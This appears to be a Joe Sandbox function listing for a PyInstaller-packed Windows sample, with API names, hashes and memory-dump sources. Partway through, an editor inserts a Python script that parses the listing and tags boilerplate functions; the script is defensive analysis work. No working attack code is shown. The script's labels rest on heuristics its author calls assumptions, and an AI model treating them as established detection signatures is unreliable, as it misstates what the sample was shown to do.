                                                                                                                                                                                                      • Instruction ID: 0ef530b5c66d8333b0de49c4743448113597bf5d41f0ae2a2c35713b507af1c4
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0fb7cb8cbc48f9e917e8c39a654de37bb9aab67e22ead0d73b96efd71e61a230
                                                                                                                                                                                                      • Instruction Fuzzy Hash: B7219E21B486D285EB64BA2269043FAEA51FF45BD4FC85530EE3D0B7C6CE3DE045C6A4
                                                                                                                                                                                                      APIs
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
• Opcode ID: 2d5c35b5412ec9e3d722ee101ab37b91f6ea8aa9dcca92d1d4e84e7f868c2b8f
• Instruction ID: 4db6ddd0342bbc456bf5ac2bef59305e82959790f2699d77c2fcfc09f1e02d68
• Opcode Fuzzy Hash: 2d5c35b5412ec9e3d722ee101ab37b91f6ea8aa9dcca92d1d4e84e7f868c2b8f
• Instruction Fuzzy Hash: FC319C31A186C695F7697B5588813FCA660AB40B94FC64335E93D033E2CFBCE94187B0
APIs
Similarity
• API ID: HandleModule$AddressFreeLibraryProc
• String ID:
• API String ID: 3947729631-0
• Opcode ID: c67799cafce48778543f3f8f4be5d8193b6380671b5390c3378b203fc6564281
• Instruction ID: 77e3f25fc3631df90c6934c1dd0cc6b5953e21149806ae3f2f42af8d86b9aa42
• Opcode Fuzzy Hash: c67799cafce48778543f3f8f4be5d8193b6380671b5390c3378b203fc6564281
• Instruction Fuzzy Hash: 23218E72A057828AEB28AF64C4442EC77A5FB44718F841739D63D07AD5DF38D984C7A0
APIs
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
• Opcode ID: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
• Instruction ID: ea438a866be39f56569a56d08e4e1f71a6e21f40d625983e6fb0b0e994b4ef63
• Opcode Fuzzy Hash: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
• Instruction Fuzzy Hash: 81113062A1868241EB78BF5194002FEE2A4AF45F90FC44231EB7C57AD6DF3DD45187E1
APIs
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
• Opcode ID: 3ea3ce3b0d542221f39e0ec21b1c29adddc4a64aa4be1ebee55588f6cedcbaa9
• Instruction ID: ccb0a3abd6f52daee80d05edc2e95a7ced09e41fb20fb9d32e20ce6d93c1a481
• Opcode Fuzzy Hash: 3ea3ce3b0d542221f39e0ec21b1c29adddc4a64aa4be1ebee55588f6cedcbaa9
• Instruction Fuzzy Hash: 9221D772608AC286D760AF18D4803B9B6A0FB84F54F944335E6BE876D5DF3CD4118B50
APIs
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
• Opcode ID: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
• Instruction ID: 500166a5650fe92580b8071ade264c7eb2e3d94f3392d6ef0fedb682d5cb0fdf
• Opcode Fuzzy Hash: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
• Instruction Fuzzy Hash: 1401A521A08B8141EB28EF6259010A9E695BF86FE0F884B31DE7C57BD6CE3CE4114350
APIs
  • Part of subcall function 00007FF7FF589400: MultiByteToWideChar.KERNEL32(?,?,?,00007FF7FF5845E4,00000000,00007FF7FF581985), ref: 00007FF7FF589439
• LoadLibraryExW.KERNELBASE(?,00007FF7FF586466,?,00007FF7FF58336E), ref: 00007FF7FF589092
Similarity
• API ID: ByteCharLibraryLoadMultiWide
• String ID:
• API String ID: 2592636585-0
• Opcode ID: 6c0d9462715ca9992f6b4afaad31bbb453c28a5b2bab261bfd845826f23efb25
• Instruction ID: bebaf3bd2d1175ab02408188de200d3c04f01f21058f7f6fcd0080b1798c4333
• Opcode Fuzzy Hash: 6c0d9462715ca9992f6b4afaad31bbb453c28a5b2bab261bfd845826f23efb25
• Instruction Fuzzy Hash: 0AD08611B2458541EB54B767754656591516B89BC4F88C035EE2D03796DC3CC0518740
APIs
• HeapAlloc.KERNEL32(?,?,00000000,00007FF7FF59B39A,?,?,?,00007FF7FF594F81,?,?,?,?,00007FF7FF59A4FA), ref: 00007FF7FF59EC5D
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1498290225.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498251254.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498348217.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498764854.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: AllocHeap
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 4292702814-0
                                                                                                                                                                                                      • Opcode ID: 359dceec71bad03d682dc04f56d48d79ef81111e86adbc932549883800f831e6
                                                                                                                                                                                                      • Instruction ID: bc63c55734354548e9b20758ae9cd3b2f3c568a5651042b0f17778a62dbb5afa
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 359dceec71bad03d682dc04f56d48d79ef81111e86adbc932549883800f831e6
                                                                                                                                                                                                      • Instruction Fuzzy Hash: ECF0F954B0A69792FF6C7A6298E12F5D2909F85B80FCC5630C97E873D1EE1DE49182B0
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • HeapAlloc.KERNEL32(?,?,?,00007FF7FF590D00,?,?,?,00007FF7FF59236A,?,?,?,?,?,00007FF7FF593B59), ref: 00007FF7FF59D6AA
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1498290225.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498251254.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498348217.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498764854.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: AllocHeap
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 4292702814-0
                                                                                                                                                                                                      • Opcode ID: 5ab6faa5eb5c52a79f6ef15f458d67d4847db3a002ac7bba2a3205d093894568
                                                                                                                                                                                                      • Instruction ID: 2873f2212832c7c6d3179c13600a18cdd484f53727a6a91f3405df183929c501
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5ab6faa5eb5c52a79f6ef15f458d67d4847db3a002ac7bba2a3205d093894568
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 67F03415E0D28645FF787A7198516F992904F95BA0F884330997E873D2EE2CA48082B0
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1498290225.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498251254.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498348217.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498764854.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Message$ErrorLast$ObjectProcessSingleWait$CloseCreateHandlePeekWindow_invalid_parameter_noinfo$ByteCharClassCodeCommandConsoleCtrlCurrentDestroyDispatchExitFormatHandlerInfoLineMultiRegisterStartupTerminateTranslateWide
                                                                                                                                                                                                      • String ID: CreateProcessW$Failed to create child process!$PyInstaller Onefile Hidden Window$PyInstallerOnefileHiddenWindow
                                                                                                                                                                                                      • API String ID: 3832162212-3165540532
                                                                                                                                                                                                      • Opcode ID: f1b4a1f9842ac9cce6b2798ee34386867a7882a0850fd65476f94626d3f01840
                                                                                                                                                                                                      • Instruction ID: bb1e8f7c11fd39835bd5c9ebc188d4382c84938100bf41fe2b99b186b4af867f
                                                                                                                                                                                                      • Opcode Fuzzy Hash: f1b4a1f9842ac9cce6b2798ee34386867a7882a0850fd65476f94626d3f01840
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 98D15D32A09AC296EB10AF74E8542E9B760FB84B58F800335DA7D47AE4DF3CD555C7A0
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1507696476.00007FFBBB631000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFBBB630000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507671623.00007FFBBB630000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507721671.00007FFBBB63D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507748441.00007FFBBB641000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507768534.00007FFBBB642000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffbbb630000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ExceptionFilterPresentUnhandledmemset$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 313767242-0
                                                                                                                                                                                                      • Opcode ID: 66b512622c9808b6d5bb10331fb7d468776e2acf9cac37bd1f86af3ecdb5c734
                                                                                                                                                                                                      • Instruction ID: 488721c52d54d7ee72d0ce80e8175655d7cf59b8ca2ca345961c6a46ed99898c
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 66b512622c9808b6d5bb10331fb7d468776e2acf9cac37bd1f86af3ecdb5c734
                                                                                                                                                                                                      • Instruction Fuzzy Hash: EB311BB7608B8186EB609F68E8903EDB361FB84744F44803ADB4E57BA4DF38D949C714
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1507537143.00007FFBBB601000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFBBB600000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507511842.00007FFBBB600000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507566222.00007FFBBB617000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507566222.00007FFBBB61B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507625049.00007FFBBB622000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507647689.00007FFBBB623000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffbbb600000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ExceptionFilterPresentUnhandledmemset$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 313767242-0
                                                                                                                                                                                                      • Opcode ID: ea9c6d9dc5ab45d36038557af9431a61bb458cf3d39685e5c3059e6e3831df78
                                                                                                                                                                                                      • Instruction ID: 08af2a71f199c7c3cf21974584f77c586001721da855c4976f4fe6424ad942a3
                                                                                                                                                                                                      • Opcode Fuzzy Hash: ea9c6d9dc5ab45d36038557af9431a61bb458cf3d39685e5c3059e6e3831df78
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6C3128B6608B8196EB648F64E8407A9B364FB84744F44943ADB4F47BA4DF38DA48C718
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • FindFirstFileW.KERNEL32(?,00007FF7FF588B09,00007FF7FF583FA5), ref: 00007FF7FF58841B
                                                                                                                                                                                                      • RemoveDirectoryW.KERNEL32(?,00007FF7FF588B09,00007FF7FF583FA5), ref: 00007FF7FF58849E
                                                                                                                                                                                                      • DeleteFileW.KERNEL32(?,00007FF7FF588B09,00007FF7FF583FA5), ref: 00007FF7FF5884BD
                                                                                                                                                                                                      • FindNextFileW.KERNEL32(?,00007FF7FF588B09,00007FF7FF583FA5), ref: 00007FF7FF5884CB
                                                                                                                                                                                                      • FindClose.KERNEL32(?,00007FF7FF588B09,00007FF7FF583FA5), ref: 00007FF7FF5884DC
                                                                                                                                                                                                      • RemoveDirectoryW.KERNEL32(?,00007FF7FF588B09,00007FF7FF583FA5), ref: 00007FF7FF5884E5
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1498290225.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498251254.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498348217.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498764854.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
                                                                                                                                                                                                      • String ID: %s\*
                                                                                                                                                                                                      • API String ID: 1057558799-766152087
                                                                                                                                                                                                      • Opcode ID: 754801c57d3e7d892bd8d831a0c0450fb277ac1fd7854ad2b3e1f46bb6674256
                                                                                                                                                                                                      • Instruction ID: 1f4735558c2cc05e2b2cae2f858f605ce02fb16e1e08164ffce82021d2475a73
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 754801c57d3e7d892bd8d831a0c0450fb277ac1fd7854ad2b3e1f46bb6674256
                                                                                                                                                                                                      • Instruction Fuzzy Hash: C6416222A0DAC295EB20BB24E4445F9A360FB94759FC00332D57D476E4DF3CD54AC7A4
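The function entries in this listing are easier to bulk-triage than to read one at a time. The script below is an added example by the editor, not part of the Joe Sandbox report: it parses the per-function fields exactly as they are printed here (API ID, String ID, API String ID, the module base from the Source File line, and the API call lines), groups functions that share an API String ID across different dumped modules, and tags entries whose API/string combination is runtime boilerplate rather than the sample's own logic. The input is a constructed excerpt of four entries copied from this listing and trimmed to the fields the parser reads. The three labelling rules (PyInstaller bootloader strings; the IsDebuggerPresent plus UnhandledExceptionFilter plus RtlCaptureContext/RtlVirtualUnwind combination of the MSVC CRT fast-fail handler; the FindFirstFileW/DeleteFileW/RemoveDirectoryW loop over "%s\*") are the editor's own heuristics and are an assumption, not Joe Sandbox signatures.

```python
"""Added triage example for Joe Sandbox function listings (editor's own code,
not Joe Sandbox's): parse each entry's fields, tag runtime boilerplate, and
find the same function recurring across dumped modules."""
import re
from collections import defaultdict

# Constructed input: four entries copied from the page's listing above,
# trimmed to the fields this script reads.
SAMPLE = """\
Memory Dump Source
• Source File: 00000002.00000002.1498290225.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
Similarity
• API ID: Message$ErrorLast$ObjectProcessSingleWait$CloseCreateHandlePeekWindow_invalid_parameter_noinfo$ByteCharClassCodeCommandConsoleCtrlCurrentDestroyDispatchExitFormatHandlerInfoLineMultiRegisterStartupTerminateTranslateWide
• String ID: CreateProcessW$Failed to create child process!$PyInstaller Onefile Hidden Window$PyInstallerOnefileHiddenWindow
• API String ID: 3832162212-3165540532
• Instruction Fuzzy Hash: 98D15D32A09AC296EB10AF74E8542E9B760FB84B58F800335DA7D47AE4DF3CD555C7A0
Memory Dump Source
• Source File: 00000002.00000002.1507696476.00007FFBBB631000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFBBB630000, based on PE: true
Similarity
• API ID: ExceptionFilterPresentUnhandledmemset$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
• String ID:
• API String ID: 313767242-0
• Instruction Fuzzy Hash: EB311BB7608B8186EB609F68E8903EDB361FB84744F44803ADB4E57BA4DF38D949C714
Memory Dump Source
• Source File: 00000002.00000002.1507537143.00007FFBBB601000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFBBB600000, based on PE: true
Similarity
• API ID: ExceptionFilterPresentUnhandledmemset$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
• String ID:
• API String ID: 313767242-0
• Instruction Fuzzy Hash: 6C3128B6608B8196EB648F64E8407A9B364FB84744F44943ADB4F47BA4DF38DA48C718
APIs
• FindFirstFileW.KERNEL32(?,00007FF7FF588B09,00007FF7FF583FA5), ref: 00007FF7FF58841B
• DeleteFileW.KERNEL32(?,00007FF7FF588B09,00007FF7FF583FA5), ref: 00007FF7FF5884BD
• FindClose.KERNEL32(?,00007FF7FF588B09,00007FF7FF583FA5), ref: 00007FF7FF5884DC
Memory Dump Source
• Source File: 00000002.00000002.1498290225.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
Similarity
• API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
• String ID: %s\\*
• API String ID: 1057558799-766152087
• Instruction Fuzzy Hash: C6416222A0DAC295EB20BB24E4445F9A360FB94759FC00332D57D476E4DF3CD54AC7A4
"""

SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
FIELDS = {"API ID": "api_id", "String ID": "string_id", "API String ID": "api_string_id"}
FIELD_RE = re.compile(r"^•\s*([A-Za-z ]+):\s*(.*)$")
CALL_RE = re.compile(r"^•\s*(\w+\.\w+)\(")        # e.g. FindFirstFileW.KERNEL32(
BASE_RE = re.compile(r"Offset:\s*([0-9A-Fa-f]+)")  # module base of the dumped PE

def new_entry():
    return {"api_id": "", "string_id": "", "api_string_id": "", "base": None, "calls": [], "label": ""}

def classify(e):
    """Heuristic labels written for this listing (editor's assumption, not Joe Sandbox signatures)."""
    api, strs = e["api_id"], e["string_id"]
    if "PyInstaller" in strs:
        return "pyinstaller-bootloader"
    if all(t in api for t in ("Debugger", "ExceptionFilter", "CaptureContext", "Unwind")):
        # IsDebuggerPresent next to UnhandledExceptionFilter, RtlCaptureContext and
        # RtlVirtualUnwind is the MSVC CRT fast-fail handler: compiler boilerplate,
        # not a custom anti-debug check by the sample.
        return "crt-security-failure-handler"
    if "FileFind" in api and "DirectoryRemove" in api and strs == "%s\\*":
        return "recursive-directory-delete"
    return "unclassified"

def parse_listing(text):
    """One dict per function; 'Instruction Fuzzy Hash' is the last field printed, so it closes a record."""
    entries, cur, section = [], new_entry(), None
    for line in (l.strip() for l in text.splitlines()):
        if line in SECTIONS:
            section = line
        elif section == "APIs" and (m := CALL_RE.match(line)):
            cur["calls"].append(m.group(1))
        elif m := FIELD_RE.match(line):
            key, value = m.group(1).strip(), m.group(2).strip()
            if key == "Source File":
                base = BASE_RE.search(value)
                cur["base"] = int(base.group(1), 16) if base else None
            elif key in FIELDS:
                cur[FIELDS[key]] = value
            elif key == "Instruction Fuzzy Hash":
                cur["label"] = classify(cur)
                entries.append(cur)
                cur = new_entry()
    return entries

def same_function_across_modules(entries):
    """API String IDs that recur in more than one module: one statically linked routine, review it once."""
    groups = defaultdict(list)
    for e in entries:
        groups[e["api_string_id"]].append(e)
    return {k: v for k, v in groups.items() if len({e["base"] for e in v}) > 1}

if __name__ == "__main__":
    for e in parse_listing(SAMPLE):
        print(f"{e['base']:#x} {e['api_string_id']:<22} {e['label']} {e['calls']}")
    for sid, grp in same_function_across_modules(parse_listing(SAMPLE)).items():
        print(f"{sid}: same function at bases {[hex(e['base']) for e in grp]}")
```

Run stand-alone it prints one line per entry plus the cross-module groups. On this excerpt the group is API String ID 313767242-0, found at both 0x7FFBBB630000 and 0x7FFBBB600000: the same CRT routine linked into two of the dumped modules, which needs one look rather than two, and whose IsDebuggerPresent call should not be counted as the sample's own anti-debugging logic.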
APIs
Memory Dump Source
• Source File: 00000002.00000002.1498290225.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
• Associated: 00000002.00000002.1498251254.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1498348217.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1498718934.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1498718934.00007FF7FF5C1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1498764854.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3140674995-0
                                                                                                                                                                                                      • Opcode ID: e81d7d82d421bb6c6595da19fcb57285cd54aee8b88ef40036ddb2a35706c3b0
                                                                                                                                                                                                      • Instruction ID: c2acd07a565e386ac312abf6f36a38e48317dc5d6bc808492fb01e9d945daff6
                                                                                                                                                                                                      • Opcode Fuzzy Hash: e81d7d82d421bb6c6595da19fcb57285cd54aee8b88ef40036ddb2a35706c3b0
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 19314372609BC196EB609F60E8403EE73A1FB84704F84413ADA6D47B98EF3CD558C750
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _get_daylight.LIBCMT ref: 00007FF7FF5A5CB5
                                                                                                                                                                                                        • Part of subcall function 00007FF7FF5A5608: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7FF5A561C
                                                                                                                                                                                                        • Part of subcall function 00007FF7FF59A9B8: RtlFreeHeap.NTDLL(?,?,?,00007FF7FF5A2D92,?,?,?,00007FF7FF5A2DCF,?,?,00000000,00007FF7FF5A3295,?,?,?,00007FF7FF5A31C7), ref: 00007FF7FF59A9CE
                                                                                                                                                                                                        • Part of subcall function 00007FF7FF59A9B8: GetLastError.KERNEL32(?,?,?,00007FF7FF5A2D92,?,?,?,00007FF7FF5A2DCF,?,?,00000000,00007FF7FF5A3295,?,?,?,00007FF7FF5A31C7), ref: 00007FF7FF59A9D8
                                                                                                                                                                                                        • Part of subcall function 00007FF7FF59A970: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF7FF59A94F,?,?,?,?,?,00007FF7FF59A83A), ref: 00007FF7FF59A979
                                                                                                                                                                                                        • Part of subcall function 00007FF7FF59A970: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF7FF59A94F,?,?,?,?,?,00007FF7FF59A83A), ref: 00007FF7FF59A99E
                                                                                                                                                                                                      • _get_daylight.LIBCMT ref: 00007FF7FF5A5CA4
                                                                                                                                                                                                        • Part of subcall function 00007FF7FF5A5668: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7FF5A567C
                                                                                                                                                                                                      • _get_daylight.LIBCMT ref: 00007FF7FF5A5F1A
                                                                                                                                                                                                      • _get_daylight.LIBCMT ref: 00007FF7FF5A5F2B
                                                                                                                                                                                                      • _get_daylight.LIBCMT ref: 00007FF7FF5A5F3C
                                                                                                                                                                                                      • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF7FF5A617C), ref: 00007FF7FF5A5F63
Similarity
• API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
• String ID:
• API String ID: 4070488512-0
• Opcode ID: 0c9ae4c43809035ead388df1149d8e15e4647e923e6de7bb59d770bfc2eeda5e
• Instruction ID: 19577b267cfca23daac5ff011ebdbb43c71149401190becd7be0bf4097eda078
• Opcode Fuzzy Hash: 0c9ae4c43809035ead388df1149d8e15e4647e923e6de7bb59d770bfc2eeda5e
• Instruction Fuzzy Hash: DBD1C026A0928286EB24BF35D4409F9A791FF45B84FC48235EA3D476D6DF3CE46187A0
APIs
Similarity
• API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
• String ID:
• API String ID: 1239891234-0
• Opcode ID: 823e7cd4caae9fc37a1281b2c5c5551f9de180c5e8ac7c275112a8c84bbfd9bf
• Instruction ID: 33fa9eb35eca640c0c64bb445f1c715feab2f126a69611951d5a1ba6ec53cb56
• Opcode Fuzzy Hash: 823e7cd4caae9fc37a1281b2c5c5551f9de180c5e8ac7c275112a8c84bbfd9bf
• Instruction Fuzzy Hash: A0319632618BC196DB60DF64E8402EEB3A4FB88754F940236EAAD43BA9DF3CC155C750
APIs
Similarity
• API ID: FileFindFirst_invalid_parameter_noinfo
• String ID:
• API String ID: 2227656907-0
• Opcode ID: 2ef3c37f04818ead7d44404f95bcb0bbc346a7a2ea351082cea4bee254bbf61c
• Instruction ID: 02d96841ccad658c57baafa351ff0ad6bfcc1f1b2a693bf5a34f38f384d63759
• Opcode Fuzzy Hash: 2ef3c37f04818ead7d44404f95bcb0bbc346a7a2ea351082cea4bee254bbf61c
• Instruction Fuzzy Hash: ABB1E622B1A6C641EF60AB6194101F9E391EB45BE4F845332DE7E47BC5EE3CE451CBA0
APIs
• _get_daylight.LIBCMT ref: 00007FF7FF5A5F1A
  • Part of subcall function 00007FF7FF5A5668: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7FF5A567C
• _get_daylight.LIBCMT ref: 00007FF7FF5A5F2B
  • Part of subcall function 00007FF7FF5A5608: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7FF5A561C
• _get_daylight.LIBCMT ref: 00007FF7FF5A5F3C
  • Part of subcall function 00007FF7FF5A5638: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7FF5A564C
  • Part of subcall function 00007FF7FF59A9B8: RtlFreeHeap.NTDLL(?,?,?,00007FF7FF5A2D92,?,?,?,00007FF7FF5A2DCF,?,?,00000000,00007FF7FF5A3295,?,?,?,00007FF7FF5A31C7), ref: 00007FF7FF59A9CE
  • Part of subcall function 00007FF7FF59A9B8: GetLastError.KERNEL32(?,?,?,00007FF7FF5A2D92,?,?,?,00007FF7FF5A2DCF,?,?,00000000,00007FF7FF5A3295,?,?,?,00007FF7FF5A31C7), ref: 00007FF7FF59A9D8
• GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF7FF5A617C), ref: 00007FF7FF5A5F63
Similarity
• API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
• String ID:
• API String ID: 3458911817-0
• Opcode ID: 4f5f64917f1a6fb99e16ec8d4eadf885fc2e5ee96e92320975b551feff7f9d51
• Instruction ID: b6ef958c8ac94739bf6d8f76c05d987a231373268d83bf905ddb53313eeba5ea
• Opcode Fuzzy Hash: 4f5f64917f1a6fb99e16ec8d4eadf885fc2e5ee96e92320975b551feff7f9d51
